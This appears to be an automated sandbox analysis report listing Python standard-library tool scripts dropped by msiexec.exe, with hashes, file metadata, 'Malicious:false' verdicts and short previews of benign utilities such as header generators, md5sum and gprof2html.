                                                                                                                                MD5:2FB7833E1CF4EC5938AC7F53AA4F5642
                                                                                                                                SHA1:FE89B699CC5A7F2A6769E529F6B15CE04ADDE56A
                                                                                                                                SHA-256:414D854F43B4C986113EB0D745B186A24C09FCD3442A69B42D53336CE20B5699
                                                                                                                                SHA-512:FD5CDE28969E400B72CD38A868BC39C2043C7476E88D758B6B30CE767055608D3BA2D50A727183D610634ACAA7B7196DD5E369B8265F95E6F7E63325D42AA2CC
                                                                                                                                Malicious:false
                                                                                                                                Preview:# This script generates the opcode.h header file.....import sys..import tokenize....SCRIPT_NAME = "Tools/scripts/generate_opcode_h.py"..PYTHON_OPCODE = "Lib/opcode.py"....header = f"""..// Auto-generated by {SCRIPT_NAME} from {PYTHON_OPCODE}....#ifndef Py_OPCODE_H..#define Py_OPCODE_H..#ifdef __cplusplus..extern "C" {{..#endif....../* Instruction opcodes for compiled code */..""".lstrip()....footer = """..#define HAS_ARG(op) ((op) >= HAVE_ARGUMENT)..../* Reserve some bytecodes for internal use in the compiler... * The value of 240 is arbitrary. */..#define IS_ARTIFICIAL(op) ((op) > 240)....#ifdef __cplusplus..}..#endif..#endif /* !Py_OPCODE_H */.."""....internal_header = f"""..// Auto-generated by {SCRIPT_NAME} from {PYTHON_OPCODE}....#ifndef Py_INTERNAL_OPCODE_H..#define Py_INTERNAL_OPCODE_H..#ifdef __cplusplus..extern "C" {{..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "opcode.h"..""".lstrip()....internal_footer = """..#if
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2798
                                                                                                                                Entropy (8bit):4.507337719281777
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:mq/2AFkRw7QOE1FrqRQUYXnRJRdNRrvd/aREn3hp3aDQ:mq+AFki7QHFrqmDnjRXRZyRk3hpoQ
                                                                                                                                MD5:276DD3D1C4A7AF63D9F22666CB7EF7E2
                                                                                                                                SHA1:690E3853ADB170E69A05B43C247D8F3900C2F9B1
                                                                                                                                SHA-256:50BF92DFFB460A9A8EB8195A54B016D75E86D186DBDD36F7CE94D3C84C722CA2
                                                                                                                                SHA-512:B73DFF8EF6289C8C833CB8861C321518BD37A92CBC81E422D4485D291C1F70CA8C1A5811AAAC73DE66722BE7484E3A93E8FD730257355D9DB80AE2EE25CFE165
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3..# This script generates Lib/re/_casefix.py.....import collections..import re..import sys..import unicodedata....def update_file(file, content):.. try:.. with open(file, 'r', encoding='utf-8') as fobj:.. if fobj.read() == content:.. return False.. except (OSError, ValueError):.. pass.. with open(file, 'w', encoding='utf-8') as fobj:.. fobj.write(content).. return True....re_casefix_template = """\..# Auto-generated by Tools/scripts/generate_re_casefix.py.....# Maps the code of lowercased character to codes of different lowercased..# characters which have the same uppercase..._EXTRA_CASES = {..%s..}.."""....def uname(i):.. return unicodedata.name(chr(i), r'U+%04X' % i)....class hexint(int):.. def __repr__(self):.. return '%#06x' % self....def alpha(i):.. c = chr(i).. return c if c.isalpha() else ascii(c)[1:-1]......def main(outfile='Lib/re/_casefix.py'):.. # Find sets of characters w
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2278
                                                                                                                                Entropy (8bit):4.922807562101874
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:OXVg/ag4qgMLBkAjIXKXzBjP5vidFZ76Ei7skPIgbEnEk8tkhaDQ:OXVgig4b4VjIXKXljxviZlVqYE9KoQ
                                                                                                                                MD5:0417E898BF255310EB652668DEF3DA95
                                                                                                                                SHA1:88F5A50565535C95A78C627A5A77F617F6FE998A
                                                                                                                                SHA-256:646621F13332602BB5F7F855CB1B55021036446A0EFEB7DA02D739E8684F1642
                                                                                                                                SHA-512:A4BA8960E8E2AAB1130093280C9C8901CB7F85EB0F5805D509BF0EE8052EEA7977E8B440F636E28C588369F28FD587C565C65F1667254510D6637316AD9FE79B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3..# This script generates Modules/_sre/sre_constants.h from Lib/re/_constants.py.......def update_file(file, content):.. try:.. with open(file, 'r') as fobj:.. if fobj.read() == content:.. return False.. except (OSError, ValueError):.. pass.. with open(file, 'w') as fobj:.. fobj.write(content).. return True....sre_constants_header = """\../*.. * Secret Labs' Regular Expression Engine.. *.. * regular expression matching engine.. *.. * Auto-generated by Tools/scripts/generate_sre_constants.py from.. * Lib/re/_constants.py... *.. * Copyright (c) 1997-2001 by Secret Labs AB. All rights reserved... *.. * See the sre.c file for information on usage and redistribution... */...."""....def main(.. infile="Lib/re/_constants.py",.. outfile_constants="Modules/_sre/sre_constants.h",.. outfile_targets="Modules/_sre/sre_targets.h",..):.. ns = {}.. with open(infile) as fp:.. code = fp.read().. e
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5025
                                                                                                                                Entropy (8bit):4.797626828136886
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:e08nYCXHkaTq8ENTEsyTCYcduKOd2rJePzPfRnqdoYRSgCN3vHaNCy:e0AYPNNTEsyTCYcduKOdoJePrfRfYQRm
                                                                                                                                MD5:A961F46742C8631B5C0D317D909CB78A
                                                                                                                                SHA1:ED48B167D98F29D86A8496F63CCF2D5F63224CEF
                                                                                                                                SHA-256:C2A006B23A04D91AC7AF275931705A120ED87BBA6658E66D1CA7A535D5530FF0
                                                                                                                                SHA-512:8F1B2C4656DB74387368E46C368B5FBDA5411BB1A28A1CD619090CBC2951D93D75A5FADC9A5FFBB709B1D057396B61C861BF2831EED5D4E127B7DA2E125536D2
                                                                                                                                Malicious:false
                                                                                                                                Preview:# This script lists the names of standard library modules..# to update Python/stdlib_mod_names.h..import _imp..import os.path..import re..import subprocess..import sys..import sysconfig......SRC_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))..STDLIB_PATH = os.path.join(SRC_DIR, 'Lib')..MODULES_SETUP = os.path.join(SRC_DIR, 'Modules', 'Setup')..SETUP_PY = os.path.join(SRC_DIR, 'setup.py')....IGNORE = {.. '__init__',.. '__pycache__',.. 'site-packages',.... # Test modules and packages.. '__hello__',.. '__phello__',.. '__hello_alias__',.. '__phello_alias__',.. '__hello_only__',.. '_ctypes_test',.. '_testbuffer',.. '_testcapi',.. '_testconsole',.. '_testimportmultiple',.. '_testinternalcapi',.. '_testmultiphase',.. '_xxsubinterpreters',.. '_xxtestfuzz',.. 'distutils.tests',.. 'idlelib.idle_test',.. 'lib2to3.tests',.. 'test',.. 'xxlimited',.. 'xxlimited_35',.. 'xxsubtype',..}....# Windows extension
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7249
                                                                                                                                Entropy (8bit):4.9163046813976505
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:J98WTGVGsJr0U12CA27E6fVK6m12GsuVfAIoQ:XE80A6m1fSQ
                                                                                                                                MD5:CD2FFC766F9783F8B87F734BED32A6AA
                                                                                                                                SHA1:0A181076FA6F77A6138BA3B791363A125A47552C
                                                                                                                                SHA-256:F20C50FE42D3604932603133A6DF8A730F291AE99A22E54C34255D6CAFD86CA5
                                                                                                                                SHA-512:5F1B1BDB3ABA12A3334EBAF807654654F64EA03A170433CC2A0CF57D0CE814441FE3916B18DF58AF167D4CE51CC891753E646C9B4F7E7370C6D20A3B2156B649
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3..# This script generates token related files from Grammar/Tokens:..#..# Doc/library/token-list.inc..# Include/token.h..# Parser/token.c..# Lib/token.py......NT_OFFSET = 256....def load_tokens(path):.. tok_names = [].. string_to_tok = {}.. ERRORTOKEN = None.. with open(path) as fp:.. for line in fp:.. line = line.strip().. # strip comments.. i = line.find('#').. if i >= 0:.. line = line[:i].strip().. if not line:.. continue.. fields = line.split().. name = fields[0].. value = len(tok_names).. if name == 'ERRORTOKEN':.. ERRORTOKEN = value.. string = fields[1] if len(fields) > 1 else None.. if string:.. string = eval(string).. string_to_tok[string] = value.. tok_names.append(name).. return tok_names, ERRORTOKEN, string_to_tok......d
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2765
                                                                                                                                Entropy (8bit):4.5001466568976705
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Kez0ZODfwbq+4QuYyRIiCKVq9Dkupyij66aV5Oh5IoQEXYZ9znRBNN68f:UOD42+4RZCK49Dk2yc66arOTGeYZ9znZ
                                                                                                                                MD5:979C44DD2CE1033D87E30217A447C5E0
                                                                                                                                SHA1:CD2C247B889E948D830D72DA72C2A11EBBA392C0
                                                                                                                                SHA-256:269C99848A8F4312032A34CEC3BD6E3E9394F52E9A9BFE297FA31A53F4F4BCB8
                                                                                                                                SHA-512:8B33EAC46F7069F889BFA6DF2983B9040774719AC45FE13F04BC2EC6D1611C29F07EF40B0C4DF99D1B07A7002830AAA05C87E813DEEFADBD8A613EC0ED4454E0
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3..#..# fetch the certificate that the server(s) are providing in PEM form..#..# args are HOST:PORT [, HOST:PORT...]..#..# By Bill Janssen.....import re..import os..import sys..import tempfile......def fetch_server_certificate (host, port):.... def subproc(cmd):.. from subprocess import Popen, PIPE, STDOUT.. proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, shell=True).. status = proc.wait().. output = proc.stdout.read().. return status, output.... def strip_to_x509_cert(certfile_contents, outfile=None):.. m = re.search(br"^([-]+BEGIN CERTIFICATE[-]+[\r]*\n".. br".*[\r]*^[-]+END CERTIFICATE[-]+)$",.. certfile_contents, re.MULTILINE | re.DOTALL).. if not m:.. return None.. else:.. tn = tempfile.mktemp().. with open(tn, "wb") as fp:.. fp.write(m.group(1) + b"\n").. try:.. tn2 = (outfile or tempfi
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):526
                                                                                                                                Entropy (8bit):4.801687349408785
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:yY8YHORtWtIC6HHnK2hNWpi4qFnMWXLKSH4Gjvt2aGE:ySIC6nK2hKNqZMeLpYkEaz
                                                                                                                                MD5:EC95269D770C03717F884FDA4CD9BDD5
                                                                                                                                SHA1:43635117C90AD072CAF47670360CA863C5327B0C
                                                                                                                                SHA-256:EA93692A7820D06663A9D28E294294C2241BCE7AE9BD3BEFF5E870A4A6B0507F
                                                                                                                                SHA-512:4FE898DEF4CEAB74AD43779D0F4319AF112838D21B7FAE98010F4E087BEFD9D735B251966607BA35006CFA451D572B222CC7532CFDC4D4AF641F905AC64788C7
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""Script to search with Google....Usage:.. python3 google.py [search terms].."""....import sys..import urllib.parse..import webbrowser......def main(args):.. def quote(arg):.. if ' ' in arg:.. arg = '"%s"' % arg.. return urllib.parse.quote_plus(arg).... qstring = '+'.join(quote(arg) for arg in args).. url = urllib.parse.urljoin('https://www.google.com/search', '?q=' + qstring).. webbrowser.open(url)....if __name__ == '__main__':.. main(sys.argv[1:])..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2426
                                                                                                                                Entropy (8bit):4.552762676805185
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:spOODxVBvdTP4YFx834Fk4bF7834lVTv4b8AbGYKN9jkHaN:kBVBF/68AZUVK0
                                                                                                                                MD5:70C70D95406B2BC74E50FD6B39EF0446
                                                                                                                                SHA1:01CD8A370DA97794285203A4D97248AF721DA5CA
                                                                                                                                SHA-256:82B181B2F5167B405DA22FB8D5597233C0005330CC1881C59405217379D9746E
                                                                                                                                SHA-512:D9A8823E1C9FE4394D1FEEA02347A85AEC608E95518D317844DC8C18DC8DE7CC38F93CFAAA4AAF90C71D54A4F98848389ABB176167C443297D77E26619B23E79
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""Transform gprof(1) output into useful HTML."""....import html..import os..import re..import sys..import webbrowser....header = """\..<html>..<head>.. <title>gprof output (%s)</title>..</head>..<body>..<pre>.."""....trailer = """\..</pre>..</body>..</html>.."""....def add_escapes(filename):.. with open(filename, encoding="utf-8") as fp:.. for line in fp:.. yield html.escape(line)....def gprof2html(input, output, filename):.. output.write(header % filename).. for line in input:.. output.write(line).. if line.startswith(" time"):.. break.. labels = {}.. for line in input:.. m = re.match(r"(.* )(\w+)\n", line).. if not m:.. output.write(line).. break.. stuff, fname = m.group(1, 2).. labels[fname] = fname.. output.write('%s<a name="flat:%s" href="#call:%s">%s</a>\n' %.. (stuff, fname, fname, fname)).. for line in input:..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9427
                                                                                                                                Entropy (8bit):4.907678052954913
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:hAX5pC2IsHcpIw93fpuUV7uAzE9Sgzf8Ccu8mfcFpowU6iCWHhNLjyHkuCQ8oAtR:WJAwIv4tv8uVyjNu
                                                                                                                                MD5:8CF90A6AF1CADAD66FC675C838AFF7EF
                                                                                                                                SHA1:F4A6EB68A4C571771589F51738BFE5F316AA6506
                                                                                                                                SHA-256:F88BB9AB982CF8227A87B3462CED4E3CF88F2605561662E16EB28157F9688BF9
                                                                                                                                SHA-512:93FE884AEB084162F205D69C82A441629A8DFF68500DC1A5FE5742DFFEFF18460231D5A2058E22A253C2444EC6BD723C7919BF226B783011FB55F1AD38065D46
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3..'''Add syntax highlighting to Python source code'''....__author__ = 'Raymond Hettinger'....import builtins..import functools..import html as html_module..import keyword..import re..import tokenize....#### Analyze Python Source #################################....def is_builtin(s):.. 'Return True if s is the name of a builtin'.. return hasattr(builtins, s)....def combine_range(lines, start, end):.. 'Join content from a range of lines between start and end'.. (srow, scol), (erow, ecol) = start, end.. if srow == erow:.. return lines[srow-1][scol:ecol], end.. rows = [lines[srow-1][scol:]] + lines[srow: erow-1] + [lines[erow-1][:ecol]].. return ''.join(rows), end....def analyze_python(source):.. '''Generate and classify chunks of Python for syntax highlighting... Yields tuples in the form: (category, categorized_text)... '''.. lines = source.splitlines(True).. lines.append('').. readline = functools.partial(next, iter
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3815
                                                                                                                                Entropy (8bit):4.324521009140807
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:DGsVuSGeD1Xiq3Nz0nMz3mOpnnmZ0H1rd4nVS2A4bs7Kl4bcHd/eFUXQghXE4eYc:9GKFNz0nMzWO9D6LtE4eyggh0lUWtM0
                                                                                                                                MD5:16A579B4895F5B82896B12F3B2E4DAD3
                                                                                                                                SHA1:D960768255611987C1270E308C21906C8CDF1A4C
                                                                                                                                SHA-256:0FB5E0CFBFCCADA7F1B08FAE3E2EA79638E49EF74281F53C2B2F6BA16C50501B
                                                                                                                                SHA-512:DFD1FEB796D16FEC0A02C7485296B65C9BE66F33B578284A6A4B1548C25BB47CE6DBA4B720F462A22D61E702DB98CFD9496F88A8686AB2C7ABC9922A04D321D5
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# Selectively preprocess #ifdef / #ifndef statements...# Usage:..# ifdef [-Dname] ... [-Uname] ... [file] .....#..# This scans the file(s), looking for #ifdef and #ifndef preprocessor..# commands that test for one of the names mentioned in the -D and -U..# options. On standard output it writes a copy of the input file(s)..# minus those code sections that are suppressed by the selected..# combination of defined/undefined symbols. The #if(n)def/#else/#else..# lines themselves (if the #if(n)def tests for one of the mentioned..# names) are removed as well.....# Features: Arbitrary nesting of recognized and unrecognized..# preprocessor statements works correctly. Unrecognized #if* commands..# are left in place, so it will never remove too much, only too..# little. It does accept whitespace around the '#' character.....# Restrictions: There should be no comments or other symbols on the..# #if(n)def lines. The effect of #define/#undef commands in the input..# f
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1036
                                                                                                                                Entropy (8bit):4.706491393830395
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:QQv5wZVTiLI79P2vmttTvrLufO4HjWL4isKpopA:dvkJiO1kmtVTCWMWL4e2O
                                                                                                                                MD5:8B4BB8EB69EF42227374443FB8EB33E7
                                                                                                                                SHA1:FD543380A7813B7CCD86F40C588D8B79F8B73D25
                                                                                                                                SHA-256:24A356BDFCB0C905F2427517BABB2A465610A89C1C479B69E1FF79E9B06EFD1F
                                                                                                                                SHA-512:55DAAE69C313D7D5BD73632A65957DE2C1491D9FFCC29A386AED9AC3C6FCC6CCCDE5E3C6B76751EC5AAA0CE46389FF99470EDA4173ACA257E4DC02F4265708AC
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3.."""Miscellaneous diagnostics for the import system"""....import sys..import argparse..from pprint import pprint....def _dump_state(args):.. print(sys.version).. for name in args.attributes:.. print("sys.{}:".format(name)).. pprint(getattr(sys, name))....def _add_dump_args(cmd):.. cmd.add_argument("attributes", metavar="ATTR", nargs="+",.. help="sys module attribute to display")....COMMANDS = (.. ("dump", "Dump import state", _dump_state, _add_dump_args),..)....def _make_parser():.. parser = argparse.ArgumentParser().. sub = parser.add_subparsers(title="Commands").. for name, description, implementation, add_args in COMMANDS:.. cmd = sub.add_parser(name, help=description).. cmd.set_defaults(command=implementation).. add_args(cmd).. return parser....def main(args):.. parser = _make_parser().. args = parser.parse_args(args).. return args.command(args)....if __name__ == "__main__":
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):664
                                                                                                                                Entropy (8bit):4.358627221003799
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:y+BRLG3GMovMoxf5XvRv2NRUIqbdOCi/RLWteVOCinwNRW852aN:y+Bk3eUaWCtiFWY+RaN
                                                                                                                                MD5:3320885F615F415CFE71DE3107F02543
                                                                                                                                SHA1:920355AD4273EC37E7CDD035C527FD64EEDDC34C
                                                                                                                                SHA-256:EF57FF2DFEFB4282A2BA7A979A4505A18DAE002E584CFA2A9C62664CBE3AC4C8
                                                                                                                                SHA-512:B2688D62D61AE35C509F0D2AB2F0510560CC1796E90D26286D37E14537EC8E618DF781552B662548915A3B91491DC252BD6970251F2BF361016CB6C0B3B277E0
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."Replace LF with CRLF in argument files. Print names of changed files."....import sys, re, os....def main():.. for filename in sys.argv[1:]:.. if os.path.isdir(filename):.. print(filename, "Directory!").. continue.. with open(filename, "rb") as f:.. data = f.read().. if b'\0' in data:.. print(filename, "Binary!").. continue.. newdata = re.sub(b"\r?\n", b"\r\n", data).. if newdata != data:.. print(filename).. with open(filename, "wb") as f:.. f.write(newdata)....if __name__ == '__main__':.. main()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2520
                                                                                                                                Entropy (8bit):4.3024182122717916
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MVtP9obWmkcLjYauUu5eVG8v5c+X93SaH:sC+lAVbsC
                                                                                                                                MD5:636C1B9927F509CB0D4A4EC392318824
                                                                                                                                SHA1:6CB49D488E02C8B79D344274A59E7A2A36079FE4
                                                                                                                                SHA-256:B25B1AC9F2A516B5866346872E5A4D217A06F325E6E16DDB72887C534A1ABE86
                                                                                                                                SHA-512:B0DF15261F45E253BD636E8D584CF82A5298EF7CB67E54288C0DCEA86911E5E55C1011CD53045C77C0EC111F58D6D0578142FEC96EEBC03BD9551E41F4B1A6B7
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# linktree..#..# Make a copy of a directory tree with symbolic links to all files in the..# original tree...# All symbolic links go to a special symbolic link at the top, so you..# can easily fix things if the original source tree moves...# See also "mkreal"...#..# usage: mklinks oldtree newtree....import sys, os....LINK = '.LINK' # Name of special symlink at the top.....debug = 0....def main():.. if not 3 <= len(sys.argv) <= 4:.. print('usage:', sys.argv[0], 'oldtree newtree [linkto]').. return 2.. oldtree, newtree = sys.argv[1], sys.argv[2].. if len(sys.argv) > 3:.. link = sys.argv[3].. link_may_fail = 1.. else:.. link = LINK.. link_may_fail = 0.. if not os.path.isdir(oldtree):.. print(oldtree + ': not a directory').. return 1.. try:.. os.mkdir(newtree, 0o777).. except OSError as msg:.. print(newtree + ': cannot mkdir:', msg).. return 1.. linkname = os.path.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):775
                                                                                                                                Entropy (8bit):4.497242574510474
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:yX1r/IBQ2YJNWuOd2FoxvaMjZUmChRiJx0IpMQrFppgWlcLc8grFVSS02aGE:yX1rM2Id2W9FGduP01QrILc8PSpaz
                                                                                                                                MD5:0EE717388DEB378CB9921CB095421BC0
                                                                                                                                SHA1:8AE47D9099365662780EE546C5248E8F080A63ED
                                                                                                                                SHA-256:C77E5EF1FF4BFC6E4249B4613DAE7F8949125FB2B3F87116CE377E422C29591E
                                                                                                                                SHA-512:E72D193B60EE9A87AE5F554B3828BD17CB3C2FBF34A8C994AA2C167E2FE6ECD61C2E17082201D250849AE92E55C89A74C01E1486EF85BF37F11D312EB1EC1CDA
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# Find symbolic links and show where they point to...# Arguments are directories to search; default is current directory...# No recursion...# (This is a totally different program from "findsymlinks.py"!)....import sys, os....def lll(dirname):.. for name in os.listdir(dirname):.. if name not in (os.curdir, os.pardir):.. full = os.path.join(dirname, name).. if os.path.islink(full):.. print(name, '->', os.readlink(full))..def main(args):.. if not args: args = [os.curdir].. first = 1.. for arg in args:.. if len(args) > 1:.. if not first: print().. first = 0.. print(arg + ':').. lll(arg)....if __name__ == '__main__':.. main(sys.argv[1:])..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8286
                                                                                                                                Entropy (8bit):4.573606120322867
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:dMBUZNT2+XVez5I5OJjyDMiutpjUBHnaKOEenFdZO7:aBUH1lybVU1aREenFfA
                                                                                                                                MD5:DBF4DBE23247E52B6E0484B7AFDA82CF
                                                                                                                                SHA1:569BB197FE78ACB2EC3EB662C8CD476771A77598
                                                                                                                                SHA-256:D09AA6F10004460378316C84F4DFA8AC33A0751107923E07CFBA8AC61962EC9D
                                                                                                                                SHA-512:86B65F746F28017F7377623C167A4DA020FBADDE34B6726207238B141064A18BCB11440ED18972C9BBC600947AD6EAE9E5588DF0E2B61F6A00F2DA17CC99E27A
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3.."""Classes to parse mailer-daemon messages."""....import calendar..import email.message..import re..import os..import sys......class Unparseable(Exception):.. pass......class ErrorMessage(email.message.Message):.. def __init__(self):.. email.message.Message.__init__(self).. self.sub = ''.... def is_warning(self):.. sub = self.get('Subject').. if not sub:.. return 0.. sub = sub.lower().. if sub.startswith('waiting mail'):.. return 1.. if 'warning' in sub:.. return 1.. self.sub = sub.. return 0.... def get_errors(self):.. for p in EMPARSERS:.. self.rewindbody().. try:.. return p(self.fp, self.sub).. except Unparseable:.. pass.. raise Unparseable....# List of re's or tuples of re's...# If a re, it should contain at least a group (?P<email>...) which..# should refer to the email addre
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2374
                                                                                                                                Entropy (8bit):5.046437991752729
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:u+egfQmffh+aSf3U+iP6T98AyVz9rcoG6Bp6Gf2vriWep:KgfQMIyPIUzJZr1Wep
                                                                                                                                MD5:1619F3B62405B93D1E0371DA57259A0C
                                                                                                                                SHA1:70F77897167A5612E8BD6A34E0BA51ED3549C41B
                                                                                                                                SHA-256:93643E9FD550555F38064F348BDB5F9A9563E16916E455A3C8ACFE244EB15BA9
                                                                                                                                SHA-512:B8847A60ABD205BAEF31C5D9994BF7203D2CCD9AB16467E90A3160091B73981ED9F5203A05508B9CDF2262F3A01F9351C08DEDAD354EF92B31D97D4C8A7D6B1D
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3.."""Script that generates the ctype.h-replacement in stringobject.c."""....NAMES = ("LOWER", "UPPER", "ALPHA", "DIGIT", "XDIGIT", "ALNUM", "SPACE")....print("""..#define FLAG_LOWER 0x01..#define FLAG_UPPER 0x02..#define FLAG_ALPHA (FLAG_LOWER|FLAG_UPPER)..#define FLAG_DIGIT 0x04..#define FLAG_ALNUM (FLAG_ALPHA|FLAG_DIGIT)..#define FLAG_SPACE 0x08..#define FLAG_XDIGIT 0x10....static unsigned int ctype_table[256] = {""")....for i in range(128):.. c = chr(i).. flags = [].. for name in NAMES:.. if name in ("ALPHA", "ALNUM"):.. continue.. if name == "XDIGIT":.. method = lambda: c.isdigit() or c.upper() in "ABCDEF".. else:.. method = getattr(c, "is" + name.lower()).. if method():.. flags.append("FLAG_" + name).. rc = repr(c).. if c == '\v':.. rc = "'\\v'".. elif c == '\f':.. rc = "'\\f'".. if not flags:.. print(" 0, /* 0x%x %s */" % (i, rc)).. e
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2611
                                                                                                                                Entropy (8bit):4.458381293012485
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:0yA+a21Q5QZKNO9YH/Nx6Too0cTkIWygdm6wQkWyU5ni9EQVhrApxNzVatW:Fra219KM+1UfWygdQQkWyU6EQV5AXhVz
                                                                                                                                MD5:7075CB720D1C165B0B5A141C8C821779
                                                                                                                                SHA1:53AA204254CB1DE67F37A6797909333CB29CF41A
                                                                                                                                SHA-256:D0E263EA219A265F6B3B53DDE2553CFAB624C7E2FB2351CDC946846CB42B3885
                                                                                                                                SHA-512:E1D216153B203776DBBDAFBCF13B6318F3C6FC09175F9088DBA47DFEACF89C861C786AEF7080EF96D2ECAE1121BAD6EE6A24EE0DB54DC5C5B88237D3BC694D59
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""Python utility to print MD5 checksums of argument files..."""......bufsize = 8096..fnfilter = None..rmode = 'rb'....usage = """..usage: md5sum.py [-b] [-t] [-l] [-s bufsize] [file ...]..-b : read files in binary mode (default)..-t : read files in text mode (you almost certainly don't want this!)..-l : print last pathname component only..-s bufsize: read buffer size (default %d)..file ... : files to sum; '-' or no files means stdin..""" % bufsize....import io..import sys..import os..import getopt..from hashlib import md5....def sum(*files):.. sts = 0.. if files and isinstance(files[-1], io.IOBase):.. out, files = files[-1], files[:-1].. else:.. out = sys.stdout.. if len(files) == 1 and not isinstance(files[0], str):.. files = files[0].. for f in files:.. if isinstance(f, str):.. if f == '-':.. sts = printsumfp(sys.stdin, '<stdin>', out) or sts.. else:..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1696
                                                                                                                                Entropy (8bit):4.546603122431339
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yXcFxO96gBGSr36Znq2K5HBBGSr3RAdiljzrK63eph8gU62P8onXJAaN:nFxI6E76Y2K5H37R5xzW68U62P8onCaN
                                                                                                                                MD5:FBB8337472A1652EC97AF0FAF6E58D40
                                                                                                                                SHA1:6FF83925DE00286084FC177262F10DAF40C92395
                                                                                                                                SHA-256:E2E661D54FF87822B2C59303F6486EC9D675DF8143748519D7E4A2827709A683
                                                                                                                                SHA-512:13DBE7A0C17E2F663C80F8D4EBD3A1BCB462A4B0CEE0D9140C74A4D7328106DBDA8FBB5000FCB86AB462F50660E300197C1D581FE6C8F01CE9068DB0D03CF51B
                                                                                                                                Malicious:false
